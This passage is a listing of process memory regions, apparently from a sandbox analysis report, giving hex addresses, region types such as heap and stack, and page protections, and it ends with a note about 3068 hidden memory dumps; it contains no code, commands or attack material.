page read and write
|
||
22AA5A42000
|
heap
|
page read and write
|
||
1B7ECC82000
|
heap
|
page read and write
|
||
1E0FD127000
|
heap
|
page read and write
|
||
1B7ECD47000
|
heap
|
page read and write
|
||
1B7EC35F000
|
heap
|
page read and write
|
||
1D807450000
|
heap
|
page read and write
|
||
25A14BD3000
|
heap
|
page read and write
|
||
1B7ECDF9000
|
heap
|
page read and write
|
||
25A16D16000
|
heap
|
page read and write
|
||
160A49DA000
|
heap
|
page read and write
|
||
25A16D0D000
|
heap
|
page read and write
|
||
22AA5A36000
|
heap
|
page read and write
|
||
1E0FE990000
|
direct allocation
|
page read and write
|
||
7FFE1338E000
|
unkown
|
page execute and read and write
|
||
160A443C000
|
heap
|
page read and write
|
||
23C91330000
|
heap
|
page read and write
|
||
1E0FD0DC000
|
heap
|
page read and write
|
||
19D366B9000
|
heap
|
page read and write
|
||
185A2543000
|
heap
|
page read and write
|
||
194D7644000
|
heap
|
page read and write
|
||
22E56820000
|
heap
|
page read and write
|
||
1B7EC316000
|
heap
|
page read and write
|
||
17ACFB90000
|
heap
|
page read and write
|
||
1B7ECCC2000
|
heap
|
page read and write
|
||
28937F15000
|
heap
|
page read and write
|
||
17ACFBB1000
|
heap
|
page read and write
|
||
1B7ECD61000
|
heap
|
page read and write
|
||
2A1D67D000
|
stack
|
page read and write
|
||
1CA1E0D0000
|
heap
|
page read and write
|
||
1F397B5B000
|
heap
|
page read and write
|
||
1B7EC6CA000
|
heap
|
page read and write
|
||
19D366AD000
|
heap
|
page read and write
|
||
1B7EC1E0000
|
heap
|
page read and write
|
||
2BAFE1D5000
|
heap
|
page read and write
|
||
1CA7B137000
|
heap
|
page read and write
|
||
202AC730000
|
heap
|
page read and write
|
||
1B7EDA18000
|
direct allocation
|
page read and write
|
||
1E0FCFC0000
|
heap
|
page read and write
|
||
2DF513B7000
|
heap
|
page read and write
|
||
22CC0F57000
|
heap
|
page read and write
|
||
1B7ECD41000
|
heap
|
page read and write
|
||
2A1E24B000
|
stack
|
page read and write
|
||
13B45611000
|
heap
|
page read and write
|
||
185BC74D000
|
heap
|
page read and write
|
||
7FF7ADE91000
|
unkown
|
page read and write
|
||
25A14B87000
|
heap
|
page read and write
|
||
1B7EC6CF000
|
heap
|
page read and write
|
||
C53EDFF000
|
unkown
|
page read and write
|
||
18A404C0000
|
heap
|
page read and write
|
||
13A07140000
|
heap
|
page read and write
|
||
1A2AB360000
|
heap
|
page read and write
|
||
185B427B000
|
trusted library allocation
|
page read and write
|
||
7FF7ADE91000
|
unkown
|
page read and write
|
||
1CE8FAA2000
|
heap
|
page read and write
|
||
1B7EC7EA000
|
heap
|
page read and write
|
||
160A49D7000
|
heap
|
page read and write
|
||
259EE7F000
|
stack
|
page read and write
|
||
1E0FD0E6000
|
heap
|
page read and write
|
||
202AC73E000
|
heap
|
page read and write
|
||
1E0805D0000
|
direct allocation
|
page read and write
|
||
185A5D99000
|
trusted library allocation
|
page read and write
|
||
160A49DA000
|
heap
|
page read and write
|
||
1E080550000
|
direct allocation
|
page read and write
|
||
19D35FFA000
|
heap
|
page read and write
|
||
13A07140000
|
heap
|
page read and write
|
||
1A2AB1A9000
|
heap
|
page read and write
|
||
1CE8C94B000
|
heap
|
page read and write
|
||
7FFD9ABF0000
|
trusted library allocation
|
page read and write
|
||
1CE8EAE2000
|
heap
|
page read and write
|
||
1B7ECC2E000
|
heap
|
page read and write
|
||
1BF9D565000
|
heap
|
page read and write
|
||
1B7EC3D4000
|
heap
|
page read and write
|
||
1B7ECADD000
|
heap
|
page read and write
|
||
7FFD9ACD2000
|
trusted library allocation
|
page read and write
|
||
1B7EC379000
|
heap
|
page read and write
|
||
1B7ECD26000
|
heap
|
page read and write
|
||
7FFD9AA76000
|
trusted library allocation
|
page execute and read and write
|
||
1B7ECDD0000
|
heap
|
page read and write
|
||
1DF90C000
|
stack
|
page read and write
|
||
160A4A09000
|
heap
|
page read and write
|
||
11C92380000
|
heap
|
page read and write
|
||
1B7ECC61000
|
heap
|
page read and write
|
||
28937C10000
|
heap
|
page read and write
|
||
14233830000
|
heap
|
page read and write
|
||
7FF7ADE7C000
|
unkown
|
page readonly
|
||
3998F4C000
|
stack
|
page read and write
|
||
1D8074F9000
|
heap
|
page read and write
|
||
185B3FA1000
|
trusted library allocation
|
page read and write
|
||
2240CA10000
|
heap
|
page read and write
|
||
202AC19A000
|
heap
|
page read and write
|
||
1B7ECDF0000
|
heap
|
page read and write
|
||
202AC198000
|
heap
|
page read and write
|
||
D5492FC000
|
stack
|
page read and write
|
||
1B7ECD24000
|
heap
|
page read and write
|
||
6AC947B000
|
stack
|
page read and write
|
||
7FFD9ACE9000
|
trusted library allocation
|
page read and write
|
||
160A43C7000
|
heap
|
page read and write
|
||
251C6AF0000
|
heap
|
page read and write
|
||
35FFD95000
|
stack
|
page read and write
|
||
1E0FD130000
|
heap
|
page read and write
|
||
1E0FD153000
|
heap
|
page read and write
|
||
22CC0F6D000
|
heap
|
page read and write
|
||
23C913D2000
|
heap
|
page read and write
|
||
1D726AE7000
|
heap
|
page read and write
|
||
19D36697000
|
heap
|
page read and write
|
||
1E0FD0DC000
|
heap
|
page read and write
|
||
160A43B6000
|
heap
|
page read and write
|
||
807EFC000
|
stack
|
page read and write
|
||
1D8075E0000
|
heap
|
page read and write
|
||
22E56720000
|
heap
|
page read and write
|
||
25A15399000
|
heap
|
page read and write
|
||
1CA385C0000
|
heap
|
page read and write
|
||
11C921D0000
|
heap
|
page read and write
|
||
1B7ECC86000
|
heap
|
page read and write
|
||
82110FE000
|
stack
|
page read and write
|
||
1D726AA0000
|
heap
|
page read and write
|
||
7FFD9ACB0000
|
trusted library allocation
|
page read and write
|
||
19D37F46000
|
heap
|
page read and write
|
||
1B7EC6C3000
|
heap
|
page read and write
|
||
19D366B9000
|
heap
|
page read and write
|
||
160A43DB000
|
heap
|
page read and write
|
||
1B7EC1C0000
|
direct allocation
|
page read and write
|
||
1FBE38C0000
|
heap
|
page read and write
|
||
202AC610000
|
heap
|
page read and write
|
||
1B7ED0B4000
|
heap
|
page read and write
|
||
1B7ED4AE000
|
heap
|
page read and write
|
||
11C921BA000
|
heap
|
page read and write
|
||
1B7ECC97000
|
heap
|
page read and write
|
||
1B7EC724000
|
heap
|
page read and write
|
||
1B7EC631000
|
heap
|
page read and write
|
||
7FFE13391000
|
unkown
|
page execute and read and write
|
||
1B7EC822000
|
heap
|
page read and write
|
||
26C3D9B0000
|
heap
|
page read and write
|
||
25A153A5000
|
heap
|
page read and write
|
||
15EDF0F0000
|
heap
|
page read and write
|
||
7FFDFF2FF000
|
unkown
|
page execute and read and write
|
||
7FFE13340000
|
unkown
|
page execute and read and write
|
||
160A43C2000
|
heap
|
page read and write
|
||
1B7EA6D0000
|
heap
|
page read and write
|
||
202AC62F000
|
heap
|
page read and write
|
||
1CE8C9B1000
|
heap
|
page read and write
|
||
4F1A73C000
|
stack
|
page read and write
|
||
1BEA7C20000
|
heap
|
page read and write
|
||
185A2610000
|
heap
|
page readonly
|
||
1B7ECB97000
|
heap
|
page read and write
|
||
C50B07F000
|
stack
|
page read and write
|
||
26C3DA10000
|
heap
|
page read and write
|
||
1BF9D2A8000
|
heap
|
page read and write
|
||
1B7ECDF1000
|
heap
|
page read and write
|
||
2DF51760000
|
heap
|
page read and write
|
||
1F8A3CB0000
|
heap
|
page read and write
|
||
185A26C0000
|
heap
|
page read and write
|
||
7FFE00466000
|
unkown
|
page execute and write copy
|
||
1F8A3CB0000
|
heap
|
page read and write
|
||
1FBE38AA000
|
heap
|
page read and write
|
||
1B7ECCE7000
|
heap
|
page read and write
|
||
1B7EC190000
|
direct allocation
|
page read and write
|
||
20C32F83000
|
heap
|
page read and write
|
||
19D366C2000
|
heap
|
page read and write
|
||
D5494FF000
|
stack
|
page read and write
|
||
160A49DB000
|
heap
|
page read and write
|
||
7FFD9AC50000
|
trusted library allocation
|
page read and write
|
||
1B7ED49C000
|
heap
|
page read and write
|
||
1F23DF70000
|
heap
|
page read and write
|
||
19D36054000
|
heap
|
page read and write
|
||
1CA38500000
|
trusted library section
|
page read and write
|
||
160A4377000
|
heap
|
page read and write
|
||
22AA590E000
|
heap
|
page read and write
|
||
1B7ECC32000
|
heap
|
page read and write
|
||
1CA7B13D000
|
heap
|
page read and write
|
||
1B7ECDD3000
|
heap
|
page read and write
|
||
1B7EC365000
|
heap
|
page read and write
|
||
1B7EDDF0000
|
direct allocation
|
page read and write
|
||
1B7ECD00000
|
heap
|
page read and write
|
||
17ACFBA7000
|
heap
|
page read and write
|
||
25A14B70000
|
heap
|
page read and write
|
||
22AA5A0C000
|
heap
|
page read and write
|
||
185B4269000
|
trusted library allocation
|
page read and write
|
||
1B7ED26F000
|
heap
|
page read and write
|
||
1CA1E1C8000
|
heap
|
page read and write
|
||
1CA2FE00000
|
trusted library allocation
|
page read and write
|
||
20ED9270000
|
heap
|
page read and write
|
||
1CA213F3000
|
trusted library allocation
|
page read and write
|
||
22AA5F2F000
|
heap
|
page read and write
|
||
7FFDFABE2000
|
unkown
|
page execute and read and write
|
||
1B7ECDF4000
|
heap
|
page read and write
|
||
7FFD9AB90000
|
trusted library allocation
|
page read and write
|
||
17ACFBB1000
|
heap
|
page read and write
|
||
25A14BD8000
|
heap
|
page read and write
|
||
1E0FE930000
|
direct allocation
|
page read and write
|
||
6AC92FE000
|
stack
|
page read and write
|
||
1B7EC7B9000
|
heap
|
page read and write
|
||
202AE024000
|
heap
|
page read and write
|
||
1B7ECC62000
|
heap
|
page read and write
|
||
1FBE38A0000
|
heap
|
page read and write
|
||
160A43B3000
|
heap
|
page read and write
|
||
1B7EDA14000
|
direct allocation
|
page read and write
|
||
1B7ECD13000
|
heap
|
page read and write
|
||
3184DFF000
|
unkown
|
page read and write
|
||
1CA7B3F5000
|
heap
|
page read and write
|
||
1CA37F70000
|
heap
|
page read and write
|
||
1B7ED9D4000
|
direct allocation
|
page read and write
|
||
1CA1E160000
|
heap
|
page read and write
|
||
15EDF110000
|
heap
|
page read and write
|
||
1B7ECCFB000
|
heap
|
page read and write
|
||
1D726AC0000
|
heap
|
page read and write
|
||
1AABE2D0000
|
heap
|
page read and write
|
||
CD7E52C000
|
stack
|
page read and write
|
||
194D9300000
|
heap
|
page read and write
|
||
25A14BA6000
|
heap
|
page read and write
|
||
185BC4AC000
|
heap
|
page read and write
|
||
259EF7E000
|
stack
|
page read and write
|
||
1E0FD14E000
|
heap
|
page read and write
|
||
22CC0F7C000
|
heap
|
page read and write
|
||
1CE8C9E0000
|
heap
|
page read and write
|
||
1B7EC760000
|
heap
|
page read and write
|
||
1CA20CCA000
|
trusted library allocation
|
page read and write
|
||
160A4396000
|
heap
|
page read and write
|
||
185B4261000
|
trusted library allocation
|
page read and write
|
||
1B7ECC2F000
|
heap
|
page read and write
|
||
1B7ECC65000
|
heap
|
page read and write
|
||
1B7EC6A9000
|
heap
|
page read and write
|
||
202AC73E000
|
heap
|
page read and write
|
||
19A85D81000
|
heap
|
page read and write
|
||
22AA5930000
|
trusted library allocation
|
page read and write
|
||
1B7ECC34000
|
heap
|
page read and write
|
||
1B7EC6CF000
|
heap
|
page read and write
|
||
1B7EC710000
|
heap
|
page read and write
|
||
1EAC1FA5000
|
heap
|
page read and write
|
||
202AC63B000
|
heap
|
page read and write
|
||
27A2EFF000
|
stack
|
page read and write
|
||
1F8A3B90000
|
heap
|
page read and write
|
||
17DDA421000
|
heap
|
page read and write
|
||
2BAFE0A5000
|
heap
|
page read and write
|
||
1B7ECC32000
|
heap
|
page read and write
|
||
160A49DE000
|
heap
|
page read and write
|
||
3F82BBC000
|
stack
|
page read and write
|
||
252A3D00000
|
heap
|
page read and write
|
||
160A4310000
|
heap
|
page read and write
|
||
7FFE1A451000
|
unkown
|
page execute and read and write
|
||
202AC192000
|
heap
|
page read and write
|
||
24C8F0F1000
|
heap
|
page read and write
|
||
160A4438000
|
heap
|
page read and write
|
||
1CA1E295000
|
heap
|
page read and write
|
||
19A85D10000
|
heap
|
page read and write
|
||
1B7EC344000
|
heap
|
page read and write
|
||
821107E000
|
stack
|
page read and write
|
||
194D7646000
|
heap
|
page read and write
|
||
160A628E000
|
heap
|
page read and write
|
||
160A4330000
|
trusted library allocation
|
page read and write
|
||
2BAFDF60000
|
heap
|
page read and write
|
||
185A24E0000
|
trusted library allocation
|
page read and write
|
||
1B7ECC80000
|
heap
|
page read and write
|
||
1B7EC3B3000
|
heap
|
page read and write
|
||
7FFD9A993000
|
trusted library allocation
|
page execute and read and write
|
||
19D35F90000
|
heap
|
page read and write
|
||
1B7EC1A0000
|
direct allocation
|
page read and write
|
||
1B7ECD1D000
|
heap
|
page read and write
|
||
1B7EDE80000
|
direct allocation
|
page read and write
|
||
1E0FD0B3000
|
heap
|
page read and write
|
||
19D36065000
|
heap
|
page read and write
|
||
25A14BDB000
|
heap
|
page read and write
|
||
22AA5F2C000
|
heap
|
page read and write
|
||
1B7ECC86000
|
heap
|
page read and write
|
||
1B7EC641000
|
heap
|
page read and write
|
||
185A2549000
|
heap
|
page read and write
|
||
7FFDFF2EA000
|
unkown
|
page execute and read and write
|
||
1CE8C9C8000
|
heap
|
page read and write
|
||
1CE8C9D8000
|
heap
|
page read and write
|
||
1D807501000
|
heap
|
page read and write
|
||
7FFE1331A000
|
unkown
|
page execute and write copy
|
||
185B426B000
|
trusted library allocation
|
page read and write
|
||
6ABD3FF000
|
stack
|
page read and write
|
||
202AC158000
|
heap
|
page read and write
|
||
1F4258D0000
|
heap
|
page read and write
|
||
185A554A000
|
trusted library allocation
|
page read and write
|
||
1B7ECCD2000
|
heap
|
page read and write
|
||
2245E9A0000
|
heap
|
page read and write
|
||
185A2585000
|
heap
|
page read and write
|
||
1B7ECD11000
|
heap
|
page read and write
|
||
19D366A8000
|
heap
|
page read and write
|
||
7FFDFB857000
|
unkown
|
page execute and read and write
|
||
7FFE14630000
|
unkown
|
page readonly
|
||
7FFE126E9000
|
unkown
|
page execute and read and write
|
||
7FFD9ACF8000
|
trusted library allocation
|
page read and write
|
||
24C8F010000
|
heap
|
page read and write
|
||
A8BB8FC000
|
stack
|
page read and write
|
||
1B7EC82A000
|
heap
|
page read and write
|
||
85209DB000
|
stack
|
page read and write
|
||
19D3608F000
|
heap
|
page read and write
|
||
1E0FD0CC000
|
heap
|
page read and write
|
||
2D5FDFF000
|
unkown
|
page read and write
|
||
19D36083000
|
heap
|
page read and write
|
||
3274FF000
|
stack
|
page read and write
|
||
1B7ECE15000
|
heap
|
page read and write
|
||
19A85D81000
|
heap
|
page read and write
|
||
7FFD9ACC0000
|
trusted library allocation
|
page read and write
|
||
22AA5A01000
|
heap
|
page read and write
|
||
1CA37DF0000
|
trusted library allocation
|
page read and write
|
||
1CE8FAB2000
|
heap
|
page read and write
|
||
17DDA315000
|
heap
|
page read and write
|
||
1FA18EBE000
|
heap
|
page read and write
|
||
13A07137000
|
heap
|
page read and write
|
||
1A2AB120000
|
heap
|
page read and write
|
||
7FFD9AA76000
|
trusted library allocation
|
page execute and read and write
|
||
22AA59F3000
|
heap
|
page read and write
|
||
1B7ECCE3000
|
heap
|
page read and write
|
||
19D36063000
|
heap
|
page read and write
|
||
1B7EC642000
|
heap
|
page read and write
|
||
202AC638000
|
heap
|
page read and write
|
||
1B7ECCEF000
|
heap
|
page read and write
|
||
1F397A20000
|
heap
|
page read and write
|
||
7FFD9A9EC000
|
trusted library allocation
|
page execute and read and write
|
||
1B7ECC7E000
|
heap
|
page read and write
|
||
1B7ECDF1000
|
heap
|
page read and write
|
||
1CE8FABD000
|
heap
|
page read and write
|
||
1B7EC323000
|
heap
|
page read and write
|
||
202AC1B9000
|
heap
|
page read and write
|
||
7FFDFB6D7000
|
unkown
|
page execute and read and write
|
||
202AC61C000
|
heap
|
page read and write
|
There are 3068 hidden memdumps, click here to show them.